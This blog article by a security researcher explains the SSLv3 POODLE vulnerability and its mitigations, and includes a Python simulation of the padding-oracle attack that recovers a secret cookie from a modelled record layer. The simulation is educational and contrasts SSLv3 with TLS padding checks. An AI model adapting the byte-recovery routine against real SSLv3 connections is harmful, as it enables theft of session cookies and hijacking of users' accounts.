
When you access high-profile sites and services such as your bank, Twitter or Google, you typically do so over https://, which relies on a protocol originally called SSL (Secure Sockets Layer), but a newly disclosed security defect could break that open. SSL and its successor TLS (Transport Layer Security) encrypt the connection to protect your information from being intercepted, spied upon or modified by attackers sitting between you and the service provider. This widely used technology is what prevents someone sat next to you in Starbucks from watching your transactions as you use your Internet banking, and it is also frequently used when you access your e-mail account to stop your username and password disappearing into the hands of cyber criminals. Simply put, SSL is a core component of security, privacy and trust on the Internet. Great though all that sounds, unfortunately many sites still fail to adhere to best practice and many don't implement these security features at all, leaving information open to interception. Even those which do try to do the right thing can suffer significant setbacks due to implementation failures or security vulnerabilities. That is precisely what has happened with the new, cutely named but very nasty POODLE vulnerability.

SSL has a number of different versions, and which ones you support matters from a security standpoint. Backwards compatibility with older versions can get you into real trouble; you can see a wonderfully detailed breakdown of the features of each version and their timelines here. The POODLE vulnerability affects SSL version 3 and, under the right conditions, lets an attacker recover information that would allow them to take over your account. For example, the flaw may let an attacker recover session cookies or credentials so they can hijack the identity of another user. The vulnerability, discovered by Google security researchers Thai Duong, Bodo Möller and Krzysztof Kotowicz, is fully outlined in this paper and makes interesting reading. Geeky bit: the attack is a padding oracle attack against CBC-mode ciphers in SSLv3. CBC (cipher block chaining) XORs each plaintext block with the previous ciphertext block before encrypting it, so that repeated blocks of data do not produce identical ciphertext blocks. SSLv3's padding is the weak point: the receiver checks only the final byte (the padding length) and ignores the contents of the other padding bytes, so an attacker sitting between browser and server who can trigger many requests (for example with JavaScript injected into a page) can copy a chosen ciphertext block over the padding block and learn one byte of plaintext each time the server happens to accept the tampered record, which takes about 256 attempts per byte.

Some browsers allow you to disable SSLv3 easily, whereas others, like Safari, can pose quite a challenge. A more complete fix is on the way (for those who want to read more, look up TLS_FALLBACK_SCSV, which lets a browser tell the server that it is retrying with a downgraded protocol version so the server can refuse the downgrade), but for the moment disabling SSLv3 is a good move. If you want to check whether your browser is vulnerable you can visit https://www.poodletest.com, which shows you a trendy-looking poodle if you are open to the attack. Using a VPN client to protect all your network traffic on open networks will also stop attackers launching the attack (as long as it is not an SSL VPN that itself uses SSLv3).

If you are a business hosting services there are steps you can take to protect your users too. Users accessing your services from open wireless networks are the most at risk. To mitigate that risk you can simply disable SSLv3 in favour of the more recent standards TLS 1.0, 1.1 or 1.2. Unfortunately some platforms and operating systems do not support the newer standards. Older versions of Internet Explorer (such as the one shipped with the old, no longer supported but still regrettably widely used Windows XP) are configured to use only SSLv3 by default, and numerous other apps and pieces of software are in the same position. If you are stuck with software that only supports these old standards you should certainly look at upgrading, not just because of this vulnerability but because that software most likely has other serious defects too. If you run a web server and want to make sure you have your transport security ducks in a row you can check out this guide, or see how your site scores using this neat tool.
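To make the "geeky bit" concrete, and to show why moving from SSLv3 to TLS closes the hole, here is a self-contained simulation added for this article; it is not the researchers' code and is not taken from the paper. It models the SSLv3 record layer (MAC, then pad, then CBC-encrypt) with a stand-in block cipher (a four-round Feistel network keyed with HMAC-SHA256, chosen so the script runs on the Python standard library alone; real SSLv3 would use a cipher such as AES or 3DES) and HMAC-SHA256 as the MAC, gives every record a fresh random IV (real SSLv3 chains IVs between records, which does not change the attack), and assumes, as the paper's JavaScript does, that the attacker can make the victim's browser send requests with chosen bytes before and after the secret cookie but cannot read the cookie or the session keys. The cookie value, the `RecordLayer` and `poodle_recover` names and the "/" and "x" filler bytes are all constructed for the example. The `strict_padding` switch applies the TLS 1.0 rule that every padding byte must equal the length byte; with it on, the same attack never recovers a byte.

```python
import hashlib
import hmac
import os

BLOCK = 16    # cipher block size in bytes
MAC_LEN = 32  # HMAC-SHA256 tag length

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key: bytes, i: int, half: bytes) -> bytes:
    # Round function of the stand-in cipher (assumption: HMAC-SHA256 Feistel, not AES).
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def prp_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def prp_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = prp_encrypt(key, _xor(prev, data[i:i + BLOCK]))  # C_i = E(P_i XOR C_{i-1})
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        c = data[i:i + BLOCK]
        out.append(_xor(prp_decrypt(key, c), prev))  # P_i = D(C_i) XOR C_{i-1}
        prev = c
    return b"".join(out)

class RecordLayer:
    """MAC-then-pad-then-encrypt record layer shared by a victim browser and a server.
    strict_padding=False: SSLv3, only the padding-length byte is checked.
    strict_padding=True:  TLS 1.0+, every padding byte must equal the length byte."""

    def __init__(self, cookie: bytes, strict_padding: bool = False):
        self.enc_key = os.urandom(32)  # session keys; the attacker never sees them
        self.mac_key = os.urandom(32)
        self._cookie = cookie          # the secret the attacker is after
        self.strict = strict_padding

    def client_send(self, prefix: bytes, suffix: bytes) -> bytes:
        """Victim sends prefix + cookie + suffix; attacker script picks prefix/suffix only."""
        msg = prefix + self._cookie + suffix
        data = msg + hmac.new(self.mac_key, msg, hashlib.sha256).digest()
        padlen = (BLOCK - 1 - len(data)) % BLOCK  # 15 means a whole block of padding
        fill = bytes([padlen]) * padlen if self.strict else os.urandom(padlen)
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.enc_key, iv, data + fill + bytes([padlen]))

    def server_accept(self, record: bytes) -> bool:
        """The oracle: does the record decrypt, unpad and verify?"""
        iv, ct = record[:BLOCK], record[BLOCK:]
        if not ct or len(ct) % BLOCK:
            return False
        pt = cbc_decrypt(self.enc_key, iv, ct)
        padlen = pt[-1]
        if padlen >= BLOCK:
            return False
        if self.strict and pt[-padlen - 1:-1] != bytes([padlen]) * padlen:
            return False  # TLS rule: padding bytes are checked too
        body = pt[:len(pt) - padlen - 1]
        if len(body) < MAC_LEN:
            return False
        tag = hmac.new(self.mac_key, body[:-MAC_LEN], hashlib.sha256).digest()
        return hmac.compare_digest(tag, body[-MAC_LEN:])

def poodle_recover(session: RecordLayer, cookie_len: int, max_tries: int = 50_000) -> bytes:
    """Man-in-the-middle recovers the cookie one byte per roughly 256 forged records."""
    recovered = bytearray()
    for k in range(cookie_len):
        prefix_len = (BLOCK - 1 - k) % BLOCK       # put cookie[k] at the end of a block
        target = (prefix_len + k) // BLOCK         # index of that plaintext block
        suffix_len = -(prefix_len + cookie_len + MAC_LEN) % BLOCK  # msg+MAC block-aligned
        prefix, suffix = b"/" * prefix_len, b"x" * suffix_len
        for _ in range(max_tries):
            rec = session.client_send(prefix, suffix)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] is the IV
            c_prev_target, c_target = blocks[target], blocks[target + 1]
            c_prev_last = blocks[-2]
            forged = b"".join(blocks[:-1]) + c_target  # swap the all-padding block for the target
            if session.server_accept(forged):
                # Accepted only if D(c_target)[-1] ^ c_prev_last[-1] == 15, so cookie[k] = 15 ^ c_prev_last[-1] ^ c_prev_target[-1]
                recovered.append((BLOCK - 1) ^ c_prev_last[-1] ^ c_prev_target[-1])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)
```

Running `poodle_recover(RecordLayer(b"s3cret"), 6)` returns the cookie after a few thousand forged requests, while `poodle_recover(RecordLayer(b"s3cret", strict_padding=True), 1)` exhausts its attempts without ever being accepted, because a 15-byte run of identical padding bytes does not appear by chance. That difference is the whole reason the fix is "stop speaking SSLv3" rather than a patch to SSLv3.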

This defect is certainly not another Heartbleed (as it will undoubtedly shortly be dubbed), but it is a failure in widely used technology that is a key component of your security.


I am the Global Head of Security Research for Sophos, one of the world's largest security companies, trying to defend against malicious code. I'm also a Certified Instructor and Director, EMEA for the SANS Institute where I teach a variety of subjects including incident handling and ethical hacking. For the past 10 years I've researched malware, hacking and cryptography. I've worked with many of the world's largest and most paranoid organizations to help define security strategy. I often appear on TV ranting about security, have delivered a TED talk and am a frequent speaker at conferences worldwide. These days I am also very keen on developing the next generation of security talent. I've done some work I'm really proud of and some stupid things. I will share my experiences and save others the trouble. Geek at heart.